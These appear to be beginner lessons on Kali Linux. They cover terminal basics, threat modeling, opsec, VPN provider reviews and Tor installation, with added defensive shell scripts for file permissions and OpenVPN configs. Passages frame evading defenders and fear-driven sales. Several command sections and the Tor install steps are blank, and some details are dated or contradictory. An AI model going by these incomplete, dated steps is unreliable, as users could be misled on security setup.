Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon
Kearns of Offensive Security as a rewrite of BackTrack, their previous forensics-oriented Linux
distribution.
Kali Linux comes preinstalled with numerous penetration-testing programs, including nmap (a port scanner),
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for
penetration-testing wireless LANs), and Burp Suite and OWASP ZAP (both web application security
scanners). Kali Linux can run natively when installed on a computer's hard disk, can be booted from a
live CD or live USB, or can run within a virtual machine. It is a supported platform for the Metasploit
Project's Metasploit Framework, a tool for developing and executing security exploits.
Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
Kali is a complete rebuild of BackTrack Linux, adhering completely to Debian development standards.
All-new infrastructure has been put in place, all tools were reviewed and packaged, and Git is used for
version control.
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we
eliminated a great number of tools that either did not work or had other tools available that provided
similar functionality.
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will
never, ever have to pay for Kali Linux.
Open source Git tree: We are huge proponents of open source software and our development tree is
available for all to see and all sources are available for those who wish to tweak and rebuild packages.
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all
Linux users to easily locate binaries, support files, libraries, etc.
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with
numerous USB and other wireless devices.
Custom kernel patched for injection: As penetration testers, the development team often needs to do
wireless assessments so our kernel has the latest injection patches included.
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals
who can only commit packages and interact with the repositories while using multiple secure protocols.
GPG signed packages and repos: All Kali packages are signed by each individual developer when they
are built and committed and the repositories subsequently sign the packages as well.
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has
true multilingual support, allowing more users to operate in their native language and locate the tools they
need for the job.
Completely customizable:
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and
inexpensive, we knew that Kali's ARM support would need to be as robust as we could manage, resulting
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories
integrated with the mainline distribution, so tools for ARM are updated in conjunction with the rest of
the distribution. Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
Okay class, it's important to realize that most of the tools in Kali are command-line programs, even when
you launch them from the applications menu: the menu entry simply opens a terminal and runs the command
for you, just as BackTrack required you to type it yourself.
The terminal is the Linux equivalent of the Windows command prompt, with a difference you will be quick to
notice: file paths use forward slashes (/root/torhammer.py) where Windows uses backslashes
(C:\tools\torhammer.py), and there are no drive letters; everything hangs off the single root directory /.
***Important***
File paths are case sensitive: /root/Tools and /root/tools are two different directories, and torhammer.py
and TorHammer.py are two different files. When you launch a program you type the whole file name,
extension included, because Linux does not strip or guess extensions the way Windows does.
Ex. /root/torhammer.py
If you had the above program installed you would run it as python /root/torhammer.py, or as
./torhammer.py from inside /root once it is marked executable. The ".py" extension does not by itself
launch anything: Linux decides what to execute from the file's execute permission bit and from the
interpreter named on its first line (the "shebang", e.g. #!/usr/bin/env python), never from the extension.
Another cool thing about Kali, and Linux generally, is that if and when you learn a programming language
you can write your own programs in a plain text editor, save the file as something like
"hacklikeaboss.py" with the interpreter line at the top, mark it executable with chmod +x hacklikeaboss.py
(or right-click the file, open its properties and tick "Allow executing file as program") and voila! Your
very own custom program has been created.
Lesson 2: Real World Applications for Kali Linux, forming your own business, and an introduction to the
terminal, the hacker's best friend.
Greetings class:
Real-world applications for Kali Linux are very diverse. Incorporating them into your repertoire as a sales pitch
is crucial to forming a thriving business model that will generate revenue for you and your company.
Statistics of the form "a personal computer is hacked every few seconds" are widely quoted; whatever the
exact figure, small businesses are compromised constantly. Thousands of people either own their own
business or work from home. These are the businesses you will start with at first to build a reputation.
Stressing the importance of data security to the customer is an integral part of the sales pitch. Looking up
news reports about local businesses in your area, or even college databases, being breached can not only
raise awareness but also raise the fear factor. Ever heard the saying "a little fear is healthy"? Well, fear sells,
and in today's day and age everyone is digital. Keep the pitch honest, though: quote incidents you can source,
because a client who catches you inflating the threat will not trust your findings either.
Some people run their business sites on WordPress and even blog on them daily about events. This consumes a
good portion of the client's time, and if someone were to take over the site because of a vulnerable plugin,
theme or out-of-date WordPress core, they could not only lose their investment but lose customers and
customer data as well.
The Kali Linux tool for this is WPScan, which we will review later on. It fingerprints a WordPress site (core
version, installed plugins and themes, user names) and checks what it finds against a database of known
vulnerabilities, so you can report them to the site owner or admin. Only scan sites you have written permission
to test.
Open ports are like open doors that anyone with the right knowledge can walk through, reaching things like
customer data and even credit card transaction information. Finding them is the job of a port scanner such as
nmap, covered in Lesson 5.
You will find that launching these programs from the drop-down menu opens a sort of command prompt in a
program called Terminal and runs the tool there. The Kali releases this course was written for log you in as
root, so every command already runs with full privileges and a tutorial on sudo isn't necessary. Note that Kali
2020.1 and later install a normal user account by default, and you prefix administrative commands with sudo;
working as root all day is also a habit worth breaking, since one typo or one hostile file can take the whole
system with it.
The terminal accepts your commands and runs basically every function on Kali, and this is where you will
spend most of your time.
Every time you start Kali from a live disk rather than a full install, I recommend opening a terminal first thing
and refreshing the package lists and the installed packages:
apt-get update
apt-get upgrade
(On a live disk these updates are lost at reboot unless you set up persistence.)
Other commands are listed below.
System Info
Keyboard Shortcuts
Ctrl + Z Suspends the current command; resume it with fg (in the foreground) or bg (in the background)
Ctrl + C Halts the current command, cancelling the current operation and giving you a fresh prompt
Ctrl + L Clears the screen
command | less Pages the output of command so you can scroll through it (arrow keys or Space and b to
move, / to search, q to quit)
!! Repeats the last command
command !$ Runs command with the last argument of the previous command substituted in
Esc + . (a period) Inserts the last argument of the previous command at the cursor, which lets you edit it
before executing the command
File Permissions
chmod octal file Change the permissions of file to octal, which is built separately for the owner, the group,
and everyone else by adding: 4 read (r), 2 write (w), 1 execute (x)
Examples:
chmod 777 read, write, execute for everyone (rarely what you want: any local user can now modify the file)
chmod 755 rwx for the owner, rx for group and everyone else (the normal mode for a script or a directory)
For more options, see man chmod.
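Two of the points above are easy to check for yourself: that Linux decides what to execute from the execute bit and the interpreter line rather than the file extension (Lesson 1), and that chmod 777 hands write access to every local user (the chmod examples just above). The script below is an added example written for this edit, not code from the original lessons. It works entirely inside a temporary directory, uses GNU stat as shipped on Kali, and the file names hacklikeaboss.py and tool.sh are made up for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original lessons): the shebang line and the
# execute bit decide whether a file runs, not its extension, and paths are
# case sensitive. Everything happens in a scratch directory that is removed.

# make_workdir creates a scratch directory and prints its path.
make_workdir() {
    mktemp -d
}

# write_script writes a file whose NAME says Python but whose interpreter
# line says /bin/sh. The kernel reads the first line, not the suffix.
write_script() {
    cat > "$1/hacklikeaboss.py" <<'EOF'
#!/bin/sh
# The extension is .py, but the interpreter line above selects sh.
echo "hello from sh"
EOF
}

# mode_of prints the octal permission bits of a file (GNU stat).
mode_of() {
    stat -c '%a' "$1"
}

# run_script_demo: write the file, try to run it before and after chmod, and
# print the result of each step on its own line.
run_script_demo() {
    dir=$(make_workdir)
    write_script "$dir"
    f="$dir/hacklikeaboss.py"

    # A freshly written file has no execute bit (644 with the usual umask),
    # so running it directly fails with "Permission denied", even for root.
    if "$f" >/dev/null 2>&1; then
        echo "ran-before-chmod"
    else
        echo "denied-before-chmod"
    fi

    # Case sensitivity: HackLikeABoss.py is a different (non-existent) path.
    if [ -e "$dir/HackLikeABoss.py" ]; then
        echo "case-insensitive"
    else
        echo "case-sensitive"
    fi

    # chmod 755: rwx for the owner, r-x for group and others. Now it runs,
    # and it runs under sh despite the .py name.
    chmod 755 "$f"
    echo "mode=$(mode_of "$f")"
    "$f"

    rm -rf "$dir"
}

# risky_world_writable succeeds (returns 0) when the "others" digit of the
# mode includes the write bit (2, 3, 6 or 7), which is what chmod 777 gives.
risky_world_writable() {
    case "$(mode_of "$1")" in
        *[2367]) return 0 ;;
        *) return 1 ;;
    esac
}

# world_writable_demo creates a tool, applies 777 and then 755, and reports
# whether each mode is flagged. A 777 script is one any local user can edit
# before you, as root, execute it.
world_writable_demo() {
    dir=$(make_workdir)
    f="$dir/tool.sh"
    : > "$f"
    chmod 777 "$f"
    if risky_world_writable "$f"; then echo "777:risky"; else echo "777:ok"; fi
    chmod 755 "$f"
    if risky_world_writable "$f"; then echo "755:risky"; else echo "755:ok"; fi
    rm -rf "$dir"
}

run_script_demo
world_writable_demo
```

Run it with sh as an ordinary user or as root; root is refused exactly like anyone else while the execute bit is missing, which is worth seeing once.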
File Commands
ls Directory listing
ls -l List files in the current directory in long format (permissions, owner, size, date)
ls -aC List all files, including hidden ones, in columns (-C and -l are mutually exclusive; the last one given
wins, so "ls -laC" is just a column listing)
ls -F List files in the current directory and mark the file type (/ directory, * executable, @ symbolic link)
ls -al Long-format listing including hidden (dot) files
mv file /home/dirname Move file into the /home/dirname directory
mv file1 file2 Rename or move file1 to file2; if file2 is an existing directory, moves file1 into it
Compression
Printing
Network
SSH
User Administration
adduser accountname Create a new user called accountname
passwd accountname Set a new password for accountname
su Switch to the superuser (root) from the current login
exit Leave the root shell and return to your normal user
Building and Installing Software
./configure
make
make install Configure, compile and install a program from a source tarball, in that order; make install
normally needs root
dpkg -i pkg.deb Install a DEB package (Debian / Ubuntu / Linux Mint / Kali); dpkg does not resolve
dependencies, so run apt-get -f install afterwards if it complains
rpm -Uvh pkg.rpm Install an RPM package (Red Hat / Fedora); not used on Kali, which is Debian-based
Lesson 3: Threat Assessment
I hope you have had time to experiment with terminal commands and familiarize yourselves with the file
structure of Kali Linux.
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this
fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson
will be on threat assessment.
Company XYZ is a Fortune 500 company that buys and trades domains on the market, processes credit card
and bank transactions, stores customer information on encrypted servers, and offers member sign-up. You
ask them and they say they are running SQL databases. Keep this scenario in mind: as you work through the
questions below, write down what XYZ's assets are (card data, customer records, the domain portfolio, the
member accounts), who would want them, and what a compromise of the SQL databases behind the sign-up
form would cost them.
Modeling
There is no single solution for keeping yourself safe online. Digital security isn't about which tools you use;
rather, it's about understanding the threats you face and how you can counter those threats. To become more
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can
change depending on where you're located, what you're doing, and whom you're working with. Therefore, in
order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:
- What do you want to protect?
- Who do you want to protect it from?
- How likely is it that you will need to protect it?
- How bad are the consequences if you fail?
- How much trouble are you willing to go through in order to try to prevent those consequences?
When we talk about the first question, we often refer to assets, or the things that you are trying to protect.
An asset is something you value and want to protect. When we are talking about digital security, the assets in
question are usually information. For example, your emails, contact lists, instant messages, and files are all
assets. Your devices are also assets.
Write down a list of data that you keep, where it's kept, who has access to it, and what stops others
from accessing it.
In order to answer the second question, "Who do you want to protect it from?", it's important to understand
who might want to target you or your information, that is, who your adversary is. An adversary is any person
or entity that poses a threat against an asset or assets. Examples of potential adversaries are your boss, your
government, or a hacker on a public network.
Make a list of who might want to get ahold of your data or communications. It might be an individual, a
government agency, or a corporation.
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can
threaten your data. For example, an adversary can read your private communications as they pass through the
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data.
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a
video showing police violence may be content to simply delete or reduce the availability of that video, whereas
a political opponent may wish to gain access to secret content and publish it without you knowing.
Write down what your adversary might want to do with your private data.
The capability of your attacker is also an important thing to think about. For example, your mobile phone
provider has access to all of your phone records and therefore has the capability to use that data against you.
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might
have stronger capabilities.
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to
access all of your data, the risk of them posting your private data online to harm your reputation is low.
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where
they are not).
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high
risks because they don't view the threat as a problem.
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to
be available than confidential.
If you want to keep your house and possessions safe, here are a few questions you might ask:
- Should I lock my door?
- What kind of lock or locks should I invest in?
- Do I need a more advanced security system?
- What are the assets in this scenario? The privacy of my home, and the items inside my home.
- What is the threat? Someone could break in.
- What is the actual risk of someone breaking in? Is it likely?
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your
possessions are valuable but the risk of a break-in is low, then you probably won't want to invest too much
money in a lock. On the other hand, if the risk is high, you'll want to get the best locks on the market, and
perhaps even add a security system.
Lesson 4: Opsec, VPN, Tor.
Opsec stands for "operations security", a term coined by the United States military during the Vietnam War
for the discipline of denying an adversary information about your own activities. When it comes to hacking,
opsec is essential so that you do not let your target know you are on to them. If you are hired to test the
security already in place, part of the job is learning how the defenders would detect you, and therefore how to
mask your attacks within the rules of engagement agreed with the client; an assessment that the monitoring
team catches on day one tells the client less than one that quietly maps what the monitoring misses. Opsec
cuts the other way too: it is what keeps your own tooling, client data and findings from leaking to the people
you are assessing, which is why the rest of this lesson covers VPNs and Tor.
What Is A VPN?
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace
or home network, or one provided by a commercial VPN service.
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end.
All network traffic through this tunnel is encrypted to ensure it is kept secure and private.
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard
network. This includes:
Network Security & Privacy: All traffic inside your VPN connection is encrypted between your device and the
VPN server. This allows you to use public networks (such as at hotels, conferences, coffee shops, etc.) and
untrusted wireless networks knowing the people sharing them cannot read your traffic. Otherwise it is
relatively easy for other people to view anything not already protected by TLS (HTTPS), such as what you are
viewing, your information and login details, etc., and even with TLS the sites you talk to are visible.
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you
were physically in the office. You can then do things like access file servers, computers, databases, email,
internal webpages, and other services you might not have access to outside of your work network.
Access Your Home Network: Connecting back home using a VPN allows you to access your computers
remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and
access other services.
Access Location Restricted Content: By connecting to a VPN server in another location you can make it
appear to websites using geolocation that you are physically in the correct location for access. So when you're
travelling overseas you can still view websites you would normally use at home, such as television, movie and
music streaming websites.
Bypass Restrictive Networks: Some networks restrict which web services can be reached, meaning that
many applications like VoIP, instant messaging, video chat, and games will not work. Using a VPN you can
tunnel through such restrictions and let all of your network applications work. Some clients (Viscosity, the
commercial OpenVPN client this description was written for, is one) can even establish the VPN connection
through an HTTP or SOCKS proxy.
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a
VPN provides a way to still maintain access to the services you would normally use.
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing,
steal username and passwords, steal session information to be able to log into sites as you, and extract other
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into
revealing important data.
Using a VPN protects you from such attacks on the local network, because your traffic is authenticated and
encrypted between you and the VPN server. It does not protect the traffic beyond that server: from the exit
onward it is as exposed as it was before, and the VPN provider itself now sits in the position the coffee-shop
attacker used to occupy, so choose one you actually trust (see the provider notes below).
A typical VPN consists of two components: the VPN client and the VPN server.
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN
connection. Viscosity performs the duties of a VPN client.
A VPN server is set up at the location users want to connect to, such as a workplace or a home. A VPN
server is usually configured and maintained by IT staff; home users, however, often set up their own personal
VPN server at home or at a remote location. End users rarely have to interact with the VPN server. The VPN
server also performs authentication to ensure only registered users can connect to the VPN.
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it
private and secure.
What Is OpenVPN?
OpenVPN is a popular VPN protocol that is based on SSL/TLS. Like IPsec and PPTP, OpenVPN handles the
connection between the VPN client and server. OpenVPN is gaining in popularity thanks to its high level of
security, customizability, and compatibility with most network environments. Of the three, PPTP should be
avoided: its MS-CHAPv2 authentication has been broken for years and captured traffic can be decrypted, so
treat a provider or router that only offers PPTP as offering no VPN at all.
There are many companies that specialize in providing a commercial VPN service. These companies are
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing
you not only to get the security and privacy benefits of a VPN, but also making it easy to access websites that
restrict access to certain countries. Most VPN Service Providers charge a small monthly or yearly fee for access
to their servers, but there are also a number of free service providers.
TorGuard
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the
ability to connect to torrent-friendly servers if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN (even
if you don't use them) isn't leaking DNS, and with it the information you thought was secure. Depending on your
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous
proxy or a torrent proxy. Their full VPN service features over 200 exit servers in 18 countries, no
logging or data retention of any kind, and their network is set up in a way that they actually have no information
to collect on their users' activities: they don't know what you're doing or when you're connected. They delivered
a really great response to TorrentFreak's questions that's well worth a read for more info. They also support
multiple connectivity protocols, virtually every desktop and mobile OS, and even offer their
customers an encrypted, offshore email service if you want to take advantage of it.
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN
servers to protect you against deep packet inspection (a technique that examines packet contents and protocol
fingerprints to identify and block traffic such as VPN connections, usually used by corporate networks,
university networks, or specific "agencies"; it recognises encrypted traffic rather than decrypting it). You
also noted that they support OpenVPN, help you get connected via your home network, and have great
customer service.
IPVanish VPN
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so many
customers leave the network from the same address and any single connection is hard to tie back to one user;
that is what they mean when they say no one has any idea what you're doing when you're connected. That
doesn't mean they're compromising on capacity though: they have over 14,000 IPs to share on over a hundred
exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for
getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They
support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions),
along with iOS and Android, and they offer configuration utilities so you can set your home router to connect
to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port
usage, don't monitor your activities, and only log a few things. TorrentFreak gave them the nod as well.
Accounts with IPVanish are $10/mo or $78/yr, and you can connect two devices at once (as long as they're
using different protocols).
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that
they're happy with you streaming video or music while you're connected to get around pesky content blocks,
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back
home or make use of their streaming music subscription.
CyberGhost VPN
CyberGhost has been around for a long time, and they made a great showing in the call for contenders thread.
Like any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection
and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on
the go, you may be able to get away with a free account. The service went through a massive overhaul about a
year ago, where they removed traffic and bandwidth restrictions for free accounts and improved security from
the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're
connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different
countries (free users can pick from one of 14, still impressive for a free service), and you can see server status
at any time.
Their clients are easy to use, support virtually every mobile and desktop platform, and they don't discriminate
against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to
get around their location blocks).
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3
hours and are limited to the official client, while pro accounts can use other connection protocols and have
far more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if
you need more than one device connected at any given time, you'll need to step up to Premium Plus, at
$11/mo or $70/yr. Those of you who praised the service noted their great connection speeds and wealth of
servers to choose from (even for free users). Read more in the nomination thread.
Do-It-Yourself
Of course, no list of great options would be complete without the DIY approach. If you don't need exit servers in
different countries, and your primary need is to encrypt and secure your data when you're away from home,
you can roll your own VPN with OpenVPN or a number of other free, open-source tools. Many of the best
routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato
firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is
that you get to set the level of encryption, you get complete control over who connects and who has access to
what parts of your home network, and where your data goes from there.
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with
a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port
blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their
VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes
the skill and knowhow to do it, and some compromise on the level of features and tools you get.
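Whether you roll your own OpenVPN server as described above or import a provider's .ovpn file, the client configuration decides how much of the security promised earlier in this lesson you actually get. The checker below is an added example written for this edit; it is not code from the original page, from Viscosity or from the OpenVPN project. It writes two constructed client configs, a lax one of the kind many providers still hand out and a hardened one, and greps each for the directives a tester should insist on: server certificate checks (remote-cert-tls, verify-x509-name), a TLS version floor, tls-crypt or tls-auth on the control channel, an AEAD data cipher, a default route through the tunnel, and a DNS server inside it (the DNS leak that TorGuard's test looks for is exactly the absence of that last one). The hostname vpn.example.com, the address 10.8.0.1 and the ca/cert/key/ta file names are placeholders.

```shell
#!/bin/sh
# Added example: a checker for OpenVPN client configs. Not from the original
# lessons, Viscosity or the OpenVPN project. vpn.example.com, 10.8.0.1 and the
# ca/cert/key/ta file names are placeholders for the real values.

# write_weak_config FILE: a constructed "works but unsafe" client config of the
# kind many commercial providers still ship.
write_weak_config() {
    cat > "$1" <<'EOF'
client
dev tun
proto udp
remote vpn.example.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
cipher BF-CBC
comp-lzo
verb 3
EOF
}

# write_hardened_config FILE: the same client with the missing checks added.
write_hardened_config() {
    cat > "$1" <<'EOF'
client
dev tun
proto udp
remote vpn.example.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
remote-cert-tls server
verify-x509-name vpn.example.com name
tls-version-min 1.2
tls-crypt ta.key
cipher AES-256-GCM
redirect-gateway def1
dhcp-option DNS 10.8.0.1
verb 3
EOF
}

# check_ovpn_config FILE: print one "missing: ..." or "weak: ..." line per
# problem found, or "ok" when there is none. Always exits 0; the verdict is
# in the output.
check_ovpn_config() {
    cfg="$1"
    issues=0

    # Directives that must be present, matched at the start of a line.
    # remote-cert-tls/verify-x509-name stop a client cert or a cert for some
    # other host from impersonating the server; redirect-gateway sends all
    # traffic through the tunnel; dhcp-option DNS keeps resolver queries
    # inside it (on Linux an up script is still needed to apply it).
    for d in 'remote-cert-tls server' 'verify-x509-name' 'tls-version-min 1.2' \
             'redirect-gateway' 'dhcp-option DNS'; do
        if ! grep -q "^$d" "$cfg"; then
            echo "missing: $d"
            issues=$((issues + 1))
        fi
    done

    # Control channel: tls-crypt (preferred, also hides the TLS handshake
    # from DPI) or the older tls-auth.
    if ! grep -Eq '^tls-(crypt|auth) ' "$cfg"; then
        echo "missing: tls-crypt or tls-auth"
        issues=$((issues + 1))
    fi

    # Data channel: an AEAD cipher, via the classic "cipher" directive or the
    # "data-ciphers" negotiation list used by OpenVPN 2.5 and later.
    if ! grep -Eq '^(cipher|data-ciphers) .*AES-(128|256)-GCM' "$cfg"; then
        echo "missing: AES-GCM data cipher"
        issues=$((issues + 1))
    fi

    # Settings that are known to be harmful.
    if grep -q '^comp-lzo' "$cfg"; then
        echo "weak: comp-lzo (compression oracle, VORACLE)"
        issues=$((issues + 1))
    fi
    if grep -q '^cipher BF-CBC' "$cfg"; then
        echo "weak: cipher BF-CBC (64-bit block cipher, SWEET32)"
        issues=$((issues + 1))
    fi

    [ "$issues" -eq 0 ] && echo "ok"
    return 0
}

# Stand-alone run: write both configs to a scratch directory and check them.
workdir=$(mktemp -d)
write_weak_config "$workdir/weak.ovpn"
write_hardened_config "$workdir/hardened.ovpn"
echo "== weak.ovpn =="
check_ovpn_config "$workdir/weak.ovpn"
echo "== hardened.ovpn =="
check_ovpn_config "$workdir/hardened.ovpn"
rm -rf "$workdir"
```

Point check_ovpn_config at any .ovpn a provider sends you before you connect; "missing: redirect-gateway" or "missing: dhcp-option DNS" means part of your traffic never enters the tunnel at all, which is the failure a DNS leak test detects after the fact.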
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman
VPN, for their cross-platform, mobile-friendly, no-logging VPN service, complete with free VPN options for
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are
the great people over at TunnelBear, who are constantly working to improve and update their service to help
you get around regional restrictions and blocks, and recently unveiled a browser add-on to tunnel some
services but not others, giving you even more control over your connection.
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly
need. You can forward remote ports, pick and choose exit servers in multiple countries, and even generate an
OpenVPN config through their wizard to connect your home network to their service all the time. Oh, and they
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to
externally, they're worth a look.
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company
that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but
you'll sign up for Giganews when you get it. They did very well in the call for contenders thread (although
many of their votes were from first-time accounts), and they certainly talk the talk on privacy issues. They
have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the
time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log
user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an
issue if you don't care about logging, but they were cagey with TorrentFreak back in 2011 on the topic, cagey
with me when I last spoke to a rep from the company, and this Reddit thread is rather illuminating as well. Still,
there are signs that things may be changing with VyprVPN. The feature set and the face of the company both
look good, and they combine Usenet with VPN services, which is great, but we don't feel comfortable calling
them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of
your data.
A final note: don't fall into the geography trap, assuming that an overseas VPN or one outside your country is
somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local
VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs
everything and is happy to turn your data over to anyone who asks, and there are definitely VPN providers that
fall in both categories.
Tor, the privacy-oriented encrypted anonymizing network, has announced the next version of its Tor Browser
Bundle, Tor Browser 4.0.4 (the bundle's own version number, not the version of the tor daemon), mostly
intended to improve the built-in utilities and the privacy and security of online users.
Tor Browser helps users browse the Internet anonymously. The Tor Browser Bundle, an anonymous web
browser developed by the Tor Project, received some updates in this release.
Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox ESR, configured to protect the
user's anonymity by routing everything through Tor (older bundles used the Vidalia controller for this; since Tor
Browser 3.x it ships its own Tor Launcher add-on instead). The anonymity suite also includes three Firefox
extensions: Torbutton, NoScript and HTTPS-Everywhere.
NEW FEATURES
The latest version, Tor Browser Bundle 4.0.4, has been released with a small number of new features:
- Updated Firefox to 31.5.0esr, with important security updates
- Updated OpenSSL to 1.0.1l
- Updated NoScript to 2.6.9.15
- Updated HTTPS-Everywhere to 4.0.3
BUG FIXES
Meanwhile, Tor Browser 4.0.4 also includes some bug fixes:
- Bug 14203: Prevent meek from displaying an extra update notification
- Bug 14849: Remove new NoScript menu option to make permissions permanent
- Bug 14851: Set NoScript pref to disable permanent permissions
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from
our distribution directory," states the Tor project team.
Tor is generally thought of as a place where users come online to hide their activities and remain anonymous.
Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services, and it is
widely used by activists and journalists to circumvent online censorship and surveillance efforts by various
countries.
However, late last year the Tor Project warned of a possible attempt to seize some of its specialized servers
called Directory Authorities (DAs), the servers that help Tor clients find the relays that make up the
anonymity network.
On the other side, last month 12 high-capacity Tor middle relays were launched by Polaris, a new initiative
by Mozilla, the Tor Project and the Center for Democracy and Technology to help build more privacy controls
into technology. Adding high-capacity middle relays increases the network's total bandwidth, so more Tor
connections can be carried at the same time without congestion.
Installing Tor in Kali Linux:
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options:
Tor is available in the Kali repository; to install it directly from the repository, open your terminal and type this:
If you can't install Tor using the first method, then you may try this option. In this way we are going to add the
official Tor repository according to our Debian distribution. Not to be confused: Kali is actually based on Debian
and it uses the package management from Wheezy, so we are going to use Wheezy as our distribution.
Now open your terminal and follow these steps:
Let's add the distribution to the list by opening the sources.list file:
leafpad /etc/apt/sources.list
Now we need to add the GPG key used to sign the packages by running the following commands:
apt-get update
Now, before installing Tor, we must add the signing key:
Finally:
If you are an advanced user and you want to install Tor using the development branch then this method is for
you.
If you want to build your own debs from source you must first add an appropriate deb-src line to sources.list.
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..
dpkg -i tor_*.deb
cd tor-browser_LANG
./start-tor-browser
This will launch Vidalia and once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root (though in Kali Linux, it doesn't make any difference).
Lesson 5: Introduction to NMap
Nmap is a very useful tool, especially for identifying open ports that are subject to attack and infiltration; its GUI
